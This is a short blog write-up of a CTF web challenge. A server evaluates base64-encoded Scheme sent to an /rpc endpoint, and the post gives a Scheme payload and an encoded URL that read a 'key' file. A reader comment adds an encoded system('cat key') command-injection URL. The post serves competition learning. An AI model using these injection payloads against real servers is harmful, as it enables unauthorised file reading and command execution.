A disturbing lack of taste. Just another WordPress site

2Mar/141

Boston Key Party CTF 2014 – Web200 Writeup

The task gave a us a link to a site containng some javascript base64 stuff and jquery ones. A broken image is displayed and once you click on it the browser will make an AJAX request to /rpc(base64_encoded_stuff) . Now decoding the part of the request after '/rpc' it pointed out that it is a number that will be sum'ed with '5' by the server after. After a bit of testing we found out that we are dealing with the functional programming language Scheme (as hinted by the title of the chall) by submitting special chars like '#' and googlin the errors that popped out. After reading the reference and the manual we tryed some code like:

( print "hi") or (* 8 8)

and they worked. So we can now take the flag just by opening the 'key' file:

( (call-with-input-file "./key"
(lambda (input-port)
(let loop ((x (read-char input-port)))
(if (not (eof-object? x))
(begin
(display x)
(loop (read-char input-port))))))))

http://54.218.22.41:4878/rpcKCAoY2FsbC13aXRoLWlucHV0LWZpbGUgIi4va2V5IgogIChsYW1iZGEgKGlucHV0LXBvcnQpCiAgICAobGV0IGxvb3AgKCh4IChyZWFkLWNoYXIgaW5wdXQtcG9ydCkpKQogICAgICAoaWYgKG5vdCAoZW9mLW9iamVjdD8geCkpCiAgICAgICAgICAoYmVnaW4KICAgICAgICAgICAgKGRpc3BsYXkgeCkKICAgICAgICAgICAgKGxvb3AgKHJlYWQtY2hhciBpbnB1dC1wb3J0KSkpKSkpKSk=

flag{))))))))))))))))))))))))))))))))))))}

Razor4x

Comments (1) Trackbacks (0)
  1. Hi very nice write-up, my team failed to use the ajax method so we solved it by using php :

    http://54.218.22.41:4878/

    => http://54.218.22.41:4878/rpcPD9QSFAgKHN5c3RlbSAiY2F0IGtleSIpOz8+


Leave a comment

No trackbacks yet.